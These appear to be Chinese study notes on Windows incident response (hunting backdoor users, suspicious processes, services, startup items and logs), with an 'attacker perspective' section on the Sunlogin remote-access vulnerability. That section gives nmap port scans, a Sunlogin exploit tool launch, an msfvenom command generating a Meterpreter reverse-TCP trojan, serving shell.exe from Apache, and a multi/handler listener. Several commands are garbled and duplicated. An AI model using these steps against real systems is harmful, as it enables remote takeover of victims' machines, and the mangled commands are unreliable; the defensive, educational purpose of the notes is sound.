windows-2
windows进程、服务、windows排查手段
第三方应用程序漏洞
排查后门用户
方法一:点击计算机管理,点击用户看看有没有不是自己创建的用户
方法二:Windows+r键输入cmd
user查看
看注册表Windows+r键输入regedit
点击第三个,点击第二个SAM如果权限不够右击打开权限,点击添加administrators点击检查名称,赋予权限然后刷新,打开SAM/Domains/Account/Users/Names
Goby主要针对系统漏洞的扫描,优点是速度快
第三方应用程序漏洞
向日葵版本漏洞
向日葵个人版for Windows<=11.0.0.33
向日葵简约版<=V1.0.1.43315(2021.12)
端口扫描
攻击视角端口扫描:
向日葵运行状态下会自动随机开启一个大于40000的端口
使用nmap扫描目标服务器端口(向日葵的端口范围一般在40000-65535之间)
nmap -p 40000-65535 10.0.0.102
向日葵版本漏洞利用
攻击视角漏洞利用:
工具启动方式:cmd命令行
java-jar Sunlogin漏洞利用工具.jar
攻击者视角木马投放
1.做木马病毒
2.植入木马
3.启动木马
kali
1.msfconsole # Metasploit
2#生成反向连接木马(reverse_tcp:目标机主动连接攻击机)
3.msfvenom-p windows/meterpreter/reverse tcLHOST=192.168.157.129 LPORT-9999-f exe > shell.exe
-p:指定payload(攻击载荷)
LHOST : I# IP (Kali # IP)
LPORT:攻击机监听端口(自定义,如 9999)-f exe:生成EXE格式文件
shell.exe:将木马保存为 shellexe
(2)搭建文件服务器(供目标机下载木马)(2)搭建文件服务器(供目标机下载木马)
1#将木马复制到Apache网站根且录
2 m shell.exelv/ar/ww/html
3 #启动Apache服务
4 iservice apache2 start
验证:浏览器访问 http://192.168.157.129/shell.exe,若能下载则说明服务器搭建成功(2)搭建文件服务器(供目标机下载木马)
(3)攻击机开启监听(等待目标机连接)
1.msfconsole #若已启动可跳过
2.use exploit/multi/handler# 加载监听模块
3.set payloadwindows/meterpreter/reverse_tcp#与木马payload一致
4.set lhost 0.0.0.0 #监听所有网卡
5.set lport 9999# 与木马 LPORT 一致
6.run#启动监听
进程:启动任务管理器
点击可疑程序,打开所在位置
二:Windows+r键
ano回车
服务:后台 隐身 存在
棱角社区
Windows+r
services.msc回车
日志:菜单管理,事件查看器,日志
进程
启动项--->钉钉 q9VX 开机后自动启动
计划任务---》定时去运行 q9 文件备份
服务----》后台 隐身 存在
日志----》
木马----》结束 进程
